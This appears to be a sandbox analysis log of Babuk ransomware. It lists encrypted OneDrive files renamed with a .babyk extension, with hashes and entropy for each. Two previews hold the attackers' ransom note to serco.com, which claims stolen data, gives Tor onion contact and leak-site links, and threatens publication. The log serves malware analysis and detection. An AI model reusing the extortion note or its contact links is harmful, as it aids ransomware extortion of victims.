                                                                            SHA1:C07DF2F7C05D93E037171C045F0AA352AFAA96B7
                                                                            SHA-256:D6F1B50EA0706F2EEF65C702814C44266D5B1FC59115FA45BBE9EA40F9EB6DE7
                                                                            SHA-512:FB30B5E1CB80F1FC916E61FD4A003E2B4E76C8B82817D5B5E3F45B9BB23F777333BFD94B5D0785CC37B038D9CB5175B7A625DBE1206E7ED3A31F73E24391E8CB
                                                                            Malicious:false
                                                                            Preview: [.w.....:`.|}..'. ...l.........}.qC...........iL..1......Y......!..3'..7....R.f....~....)"..x.gwEz....."DL..G^...4.E;...H.P.......6o.....q....51..S..[R...MF.h?..z_Q?tns%.~.......3.&.6.e...&....#O5N.,.[G..MU.}..^......%1..h\5.`r]5e#..E.f";..E...\u/...Q`&..sD..A.F.u&.A...u...VN.D.p.q.J...m--..O|=..4..$H.....s..m.H..3..3^........60.....%8.y.......:...O/...brJ..S..n.<..F..M,"W...]!..{.TU......d.Q.a.E.-.......\.nk...#.%R..Y......iCm.e...i...U..=g.Q.tM.F.x.s=.U.i.[:~z.c.<..[#e...7..P'7...9...=<41].V[.&.....@:........[...@.w8.{.f.+9....":..P(6y$.vn..[.........K...U...]..L..X...................$.Ua..V...l....(|...*..9g.............o..'....].v.Zg...Gx.Kbq.....w@...@...5.5J.D."}..kv.Ss.u....5E.7..z.9@...[...|..5X%#bV....l......16dq....m.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-125.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1016
                                                                            Entropy (8bit):7.793510509870985
                                                                            Encrypted:false
                                                                            SSDEEP:24:dWi+nPHNcaMK1ja/pbPYJgIWodoZTKqm2Dl7VI17o9zGvUQBus3:wRHNcaMppCdoZT77VSiGv13
                                                                            MD5:2E72E86BB9F523096B242856858EDD24
                                                                            SHA1:707CFA2BECF5142117551F1D837D2166A8663AA2
                                                                            SHA-256:2BD80D883DF0B5EA93465305A95985E3E5226375057A15BA8BDA932946DAE610
                                                                            SHA-512:031291A8BCAE95FE4D32C863A3F7D469A7B57673B49C34CF9E4E90ADD1BDC9BC55AD180868B86063B9A19F0776BC8FAE620656FEA9A3191E3BA5F0DBFFA97C8B
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-150.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1158
                                                                            Entropy (8bit):7.820139597572714
                                                                            Encrypted:false
                                                                            SSDEEP:24:kc7qH5/hYZgwDgFNtBdgJ3tge/QdQFLeKOynLk3WLzj9OYiURGXZ:R2hYu8gMF/sVQk3WLlniJZ
                                                                            MD5:536849C63602C443D866E5446CF0D3BF
                                                                            SHA1:6AD2082FEFB01648C47D39C2C3D0891B45AB7707
                                                                            SHA-256:CD63846FA4565E83EC9D8EA50B84B455DF07919ED2903975E2C2A88B76188C6C
                                                                            SHA-512:DBC4DB77FD416FD54FB969592A65C31B7461D2F6CF6179A178F9DA9AA50F289D2C6D8A8C33E74ED27FC8444E186A87150DCD5C7E6E5B37884AA3E5DF22532E57
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-200.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1560
                                                                            Entropy (8bit):7.890237383290061
                                                                            Encrypted:false
                                                                            SSDEEP:48:dyWo4TwqCqnTSiZVo8i9oK9h341W4qRTu:dyeXCeSifLeFh341W4qdu
                                                                            MD5:EAD7519FBF274B65949D1C3813B9B37D
                                                                            SHA1:ADB742DBD66CFFC9CD84338F4C8550E709D1A2D9
                                                                            SHA-256:7016875B5D53E9FC8122EAD6C39FE0EAE74FA369861B1C0B5B5B294CCE987CF3
                                                                            SHA-512:7E8E63A90F6CA503CB2752EEF0DA1FAFA0CE8FB360C50E8E933FC6A2E0C184617C0C0532D54E15F704D7EA9B3D3E67309DE46516393C7D77D69597F1B34A9AA5
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-400.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):3394
                                                                            Entropy (8bit):7.940556459040627
                                                                            Encrypted:false
                                                                            SSDEEP:96:nPkZWpEa1OQq90KE2Q6wgSyUNwa4zxRqbu3wXCDDxix:n+qgE2Q6tLCAXpDxY
                                                                            MD5:E4D520CD8CC45B24E33D8F48C15FD092
                                                                            SHA1:B26568038FE0CE469291C05A928DF540D29748E4
                                                                            SHA-256:FAF6D9AEBE6B634F6890F70B06E93ADC3C367B5E57F3E156908A1CC7BD8BF6C6
                                                                            SHA-512:BEDF6BB9E4F59EEE568A9AD191E6B971796CBF3183F4230A1A9B3F037D992450D15EB97312F7FD8384E3713F278E2501CF405489C031C40CAF2712B5F1282480
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-100.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):830
                                                                            Entropy (8bit):7.7392387165568115
                                                                            Encrypted:false
                                                                            SSDEEP:24:A4x33FUGpk0akMJEVBprNcWoZ6SX0D4NEZ0p2VH:Nxc0akMJ+jcWowSK4K08t
                                                                            MD5:F3B2B81F5E7D31D6C389576688B07921
                                                                            SHA1:66F58ADA4D37D8374D2282574D1D32FFFF5FEEEF
                                                                            SHA-256:0A4F4E898516217AA419D86A0B04D7EE47CDE28FB3E0BD72094D2E1B57698CA3
                                                                            SHA-512:B0845B835E6537D91EECEF47E6FCDDA40E8F787FD52B5A445E2907647FA8E32E01D58699A5419F92712E73CD7E2E7A0491F1CE1A30C32EF7F0BB62E03FE1EF01
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-125.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1039
                                                                            Entropy (8bit):7.829439669749516
                                                                            Encrypted:false
                                                                            SSDEEP:24:grit3SApXv2VCyx7jyq0MAhAiAXlrnWGHNFEM0aLmuD8:grioAVSrXyq0ThAiAVrWkFEM0amuI
                                                                            MD5:C2F4E2198F9C995A4138F3754CFCCF79
                                                                            SHA1:DF5C454B22269C8F3E85FB0E6C34ED20BFFA68A8
                                                                            SHA-256:EF7E47BCCCF9B00BD7CF4F2C5D8D629330369AD76608C5F1864884C8E218E92A
                                                                            SHA-512:EC234D8344C50BB43288AE6C648D9F96FF2176E67EB7C3A8246B9943A7D11BD5E15BD4D416982534208F9D299FCB0C5018A8A4FA565E9202BDB7D4DBE5036EDD
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-150.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):968
                                                                            Entropy (8bit):7.788191058888734
                                                                            Encrypted:false
                                                                            SSDEEP:24:bt69TYtKmIVYfaz/GEkxkqjWy3YxevSLCjOq:p6900mIo8SzK9YvSCR
                                                                            MD5:8CEEC87C74B738A54E279B45B6D8A77E
                                                                            SHA1:8857C6FC31123180853405AB41FDEC67F25F0DB8
                                                                            SHA-256:D6416EBDC21FB90AFC3DA85997E4CE8B34D8FC47D912A188C5B3B9926A9F85B1
                                                                            SHA-512:172C485B23A54088E7FD4673DB201F77F17660D2B9E881B2A037848F6E27E982A21E488D61508D9731CC9DC2F4EB0C3203EA7BD8D6A6BB29E9B5122EAFF2C75D
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-200.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1661
                                                                            Entropy (8bit):7.890107059381409
                                                                            Encrypted:false
                                                                            SSDEEP:48:giDf7w/ELxTqsYgfDocGO5/8fYEihDdnZZtJZ5:FEgxlfzqgEwDdZZf
                                                                            MD5:47C8CE747409639F72D8D3E8E35F8916
                                                                            SHA1:2A387E6002269C56F48ED313A1C8248767C15E92
                                                                            SHA-256:E1C1746B82D0812D8A9EC2F6D22CD95B7617A27F53E81DF46B11E59CD50AD479
                                                                            SHA-512:58B20D8D6E4E9770224EE557FA6E307D995AC4AF8E67A35AB714EA4F1B5B0BD6BA5AF7FE9A0FC7F1B8F9654A7DE2B4A2A3841F761C6ABD7760BB085EAC8FA430
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-400.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):3706
                                                                            Entropy (8bit):7.953214306334212
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-100.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):820
                                                                            Entropy (8bit):7.730165490762418
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-125.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1016
                                                                            Entropy (8bit):7.754529935637241
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-150.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1158
                                                                            Entropy (8bit):7.8327192864094775
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-200.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1560
                                                                            Entropy (8bit):7.871012342689059
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-400.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):3394
                                                                            Entropy (8bit):7.944732837023405
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-100.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):581
                                                                            Entropy (8bit):7.613726800586591
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-125.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):693
                                                                            Entropy (8bit):7.691832770494788
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-150.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):759
                                                                            Entropy (8bit):7.693592618321914
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-200.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):971
                                                                            Entropy (8bit):7.771514047258955
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-400.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1888
                                                                            Entropy (8bit):7.8940862497227755
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-100.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):584
                                                                            Entropy (8bit):7.609817543535703
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-125.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):700
                                                                            Entropy (8bit):7.6688901190500305
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-150.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):765
                                                                            Entropy (8bit):7.748163763964508
                                                                            Encrypted:false
                                                                            SSDEEP:12:q/WlzZMbUtHkBmIBhqUselGYQo5BVdUC4Nf/erx43SKklMv+5CL+:zlzZdtHkBm0o0/QUBVdU5/g4CKT+5CC
                                                                            MD5:0CE76AA42ABA7A3AACC007BC5678B9AD
                                                                            SHA1:78A76C9CAAE32A8B5E76632CD99FA4BB9F2C27FA
                                                                            SHA-256:A33AE34B035122526731B12050BDD759E636BA10D5CD77FBFE1FE6562A3A6379
                                                                            SHA-512:5F520B8CC19CE08DCF5CBA76026BF3392D177C89C993145CA28F31EF2817261ED0FBEC05799EF0018085525D338ACDB4FABDFD0D5D1702A5B7F5D7BE3CE399BD
                                                                            Malicious:false
                                                                            Preview: ...choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-200.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):982
                                                                            Entropy (8bit):7.779882551757573
                                                                            Encrypted:false
                                                                            SSDEEP:24:meCzr/7on4cXHv+g8ym8QarQ9jJr5kf1ECe:DCf/7EWLvXar4lr5kf1ECe
                                                                            MD5:9D0528F8023278E83429DD841C142305
                                                                            SHA1:BF3A9584B3445AF38F99F104F2205C58F77B40B0
                                                                            SHA-256:635111E874B75CA1CA10A80588E3A938D618843497B4631F9A08BC9C44C2CE75
                                                                            SHA-512:F246205A695F5400B1A4B1EA4A91A7EE03EB83FF746E1C0FF8F3A54ED113F46BB8759E85E3172F6003E62789DAC48C0DE4903C42172865B2215E6B3D5EEEFC81
                                                                            Malicious:false
                                                                            Preview: ...choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-400.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1944
                                                                            Entropy (8bit):7.890917388051763
                                                                            Encrypted:false
                                                                            SSDEEP:48:GJ9AVfM47PAcSb4j5lAMnzTSLrj6sKfQReo3Sx11:Gg3oJbuMMn/Qjr4DJX1
                                                                            MD5:5C60B6DC2FB9EE857050EBE52894DB85
                                                                            SHA1:8C80CAB6C979F2F178BCDE332D1AE15F91AA783A
                                                                            SHA-256:9C39847DC2DE1CF0C759F0EA17D9CD56D9B55C985CBAFA180F413303D1931197
                                                                            SHA-512:369733B99DD765396943C53E091C7AB4BE223CF1F88E7CB98B0AF6255738734F0F27F0480F78088B0A5F66855A1C4000EF44EDFC3E03CE1D8DA1555B57C451AF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-100.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):581
                                                                            Entropy (8bit):7.654395297777812
                                                                            Encrypted:false
                                                                            SSDEEP:12:gnYT9mZ291DS9yYOxsQM9Z7rywau9x1D/xRJ9hL/as:4YTk21e9yjQb7r+u9xjRJx
                                                                            MD5:F32891AECAE4304233D97F567F30BA65
                                                                            SHA1:705703B0F11F3366358C8DF45844DB445A696D91
                                                                            SHA-256:AA02AD1E100482517C7362F621AD5A4CEEDF32AB414E436AFBB3B6193C8B9DCB
                                                                            SHA-512:B1D4423CF713B0CC8C9E1CDEDE3509F3C312C3C7903937D86F384BCB2BEEAD0A46AE85354F19CA0535175E4FCB340F3E4B0A64163A86DCE212453614ADC63F5D
                                                                            Malicious:false
                                                                            Preview: ...choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-125.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):693
                                                                            Entropy (8bit):7.658825307403589
                                                                            Encrypted:false
                                                                            SSDEEP:12:hYy91oS9yRYrC+3Mtcqo/GHWmVMLyYrlMGPa2Z1gGKv45hyCCr0bZu:hYywgrC+3MmZG2mqT22Z1gHxCCQ9u
                                                                            MD5:EDDFDD992FCF69BD8DB1CB3C06A6BD40
                                                                            SHA1:107EBA5B9E118151C1D5B7D4C5127BCB8630C02D
                                                                            SHA-256:6BFE435A10D5F5918F7A20FD5135FB2CD5BF841A90ECE5F2AF081CFB768B3760
                                                                            SHA-512:60B09139DF2F0220E9003A31A1A32FD3708A7F4A3930149C712DDD30E3E877937481585421CD46647EEA10AA9752558B8E83EF766FF2F0685EB11B4B7B61C698
                                                                            Malicious:false
                                                                            Preview: ...choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-150.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):759
                                                                            Entropy (8bit):7.687678065894792
                                                                            Encrypted:false
                                                                            SSDEEP:12:kumlpNB/wiILuym8iUJtVlnrUB5jwhamvRe5yXiG0M0RpQUDPC/BIMw2Ig8KGMNL:zmlpNi7WQJP2B5WamZeIXr0VQIa5IR0V
                                                                            MD5:A6DA59E6AEE2834E1E9BBE6ABEAA430F
                                                                            SHA1:85DFF67E1423525B67E9833C7BF098B3553A1579
                                                                            SHA-256:02A9D13AE6E9CEC63494992EE88B0249B9063F1B3D23C50D9812F1348EF6A158
                                                                            SHA-512:EA914D73BBBA41AF82C2EC6D06162C064105141B87EC77DB62AA60EAD11053314C00C3FFA0E40B44357EA1074B0FF7B18E9DD5FAEB3FD27D88D1435FFB1FE564
                                                                            Malicious:false
                                                                            Preview: ...choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-200.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):971
                                                                            Entropy (8bit):7.815816221403926
                                                                            Encrypted:false
                                                                            SSDEEP:24:zxecjrvBWzlXUUoFZKWm7Bt9HLRGhz8Urcguff3+Wex:zxPrvBWzlHoFfmjlNwB4Fffn4
                                                                            MD5:97B16A5D9D96E3953B5BB144D28CC0BB
                                                                            SHA1:5D41883F407151ADAC8605B4F90950BBA0E077C3
                                                                            SHA-256:3F4FEE93757E5466FCF19D94B8F8292040AD251E5590FBF81F817D462F8912C5
                                                                            SHA-512:37103D4CD59CB6552A995C4BB531FD1C0FD486D0972F9C586AFF03AF7DBFF829C5DAB0F3EDBC7F260648D5C221259EC177948F71B53C8D0189C3B935615A80AE
                                                                            Malicious:false
                                                                            Preview: ...choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-400.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1888
                                                                            Entropy (8bit):7.904359994957081
                                                                            Encrypted:false
                                                                            SSDEEP:48:b1hXyoX5yJA33MynXhy3Lwuas7+1PU8yD:bTXyoUicf3LwuQ1sJ
                                                                            MD5:CF008B578278C5238BF1216F86CE5525
                                                                            SHA1:D8D29E75275BC420DDE46AC587847D2EACB07841
                                                                            SHA-256:8D0AA06F72876F2EA24334C9EDD12804C57C982753ACA1495ED6D9A1C84CBF0F
                                                                            SHA-512:F7F63C7E722543BD4A663F77B24BE69A500C1E23282C93FAA5870B0632D0400E1184DBA2C9881973EFFEC8A8FB192BA29D46BB214443F98B497024DD5426861D
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.VisualElementsManifest.xml.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):512
                                                                            Entropy (8bit):7.476376058277544
                                                                            Encrypted:false
                                                                            SSDEEP:12:lEJYwswbcjDaa5rTwqEIQJyUr7FoCSKwsYtjC8b/e:lEJYwbvaxEIQJ5Vo2+t+8y
                                                                            MD5:15D4FCB7BD5D416152F9A8AFD821AD67
                                                                            SHA1:78D5BDFFBF93CD892359DBD1B4909DFDFDBDB488
                                                                            SHA-256:FAB4B017435AF010C72DD6392D2638C9A7A76454639F5232E5A3E866E321091F
                                                                            SHA-512:53B9D86FB8B7F79EB106BBE43787B014B8CDA25088F0EED0E9A7E808995FFEC02E771CCB3676C9E0F710E9E888B151B06D8C45B1965049D85F070E7BCCB9F428
                                                                            Malicious:false
                                                                            Preview: ...choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\Resources.pri.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):4584
                                                                            Entropy (8bit):7.9622044639762635
                                                                            Encrypted:false
                                                                            SSDEEP:96:swOI5rlWDyxsAtL4vmLeClCA2wgZXwfkFuR35N/1rz2UIUR4qJ7:hnNlWD3M4vm9j7iKfR35hF23eJ7
                                                                            MD5:B861D1E493BDB37CB671802BC8400E7E
                                                                            SHA1:50186E5FDE14788A52CA169AA50E1D3BDE6C0E87
                                                                            SHA-256:56C7838F88ABA15177801A3F569027845D4DF70023B511E744F1A4F06B011403
                                                                            SHA-512:8E65D06DAE6B2C4079BCB42094D99D1C180C4BDCEFAAA6DCBE1A007DA3005B8455F06E0B94D2BA3077049905E976BB084F3533594EA506DCAD2032414073207A
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\ECSConfig.json.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):432
                                                                            Entropy (8bit):7.472753431689424
                                                                            Encrypted:false
                                                                            SSDEEP:12:JlPSKb4yWscyOVt1VsmCKnmgAVzWtro8PS:JlPfb4acyOVt1lnZmWho8PS
                                                                            MD5:D9D9A700BE90C88946E4BC5714C97E9A
                                                                            SHA1:E220BCD097A61B7CFD1F42904BBBA29CD83BD5C0
                                                                            SHA-256:99CA4482E2221BE4960134AD2041297060CB951A4F975423795CF0A38A6F8BB7
                                                                            SHA-512:9AB90715A2F6416C460DC48376FD18745809D335F68F214E878890E1F30376F0447CAD08CE147ED7CD065770EA4C8619939D11D2F3E330B0CA895936A85C21DA
                                                                            Malicious:false
                                                                            Preview: ...choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\DeviceHealthSummaryConfiguration.ini.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):245
                                                                            Entropy (8bit):7.052212212751961
                                                                            Encrypted:false
                                                                            SSDEEP:6:ojlmfAt8O0/XbMDZ19g5nn4rABSAQRtDmi5+0vtn:oj4fAqO0/Eu5n4rABS1RrR
                                                                            MD5:CCD351735E0FBF92EF17D3196CDA752F
                                                                            SHA1:27455104005813DA4D6D6D4FFD988379658087E0
                                                                            SHA-256:C5C8C5936D64043DAF7B05F5072A9AA7FF28BA76AB8EC464D135AFDD65F915F4
                                                                            SHA-512:7BFE351C569524D3578860CDF11E2731065FDD3AD75024750D9C01657ED490278F5C39504CA5EAD93DFEB5ED27DCDEEE735E793DF9A7229B585AFF286777DBB9
                                                                            Malicious:false
                                                                            Preview: ...choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Downloader_2019-06-27_195650_1008-3040.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):15034
                                                                            Entropy (8bit):7.987947899597984
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Downloader_2020-07-23_174109_5608-5612.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):36454
                                                                            Entropy (8bit):7.994570807031086
                                                                            Encrypted:true
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Downloader_2020-07-27_144632_3336-1696.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):27688
                                                                            Entropy (8bit):7.993223223306985
                                                                            Encrypted:true
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
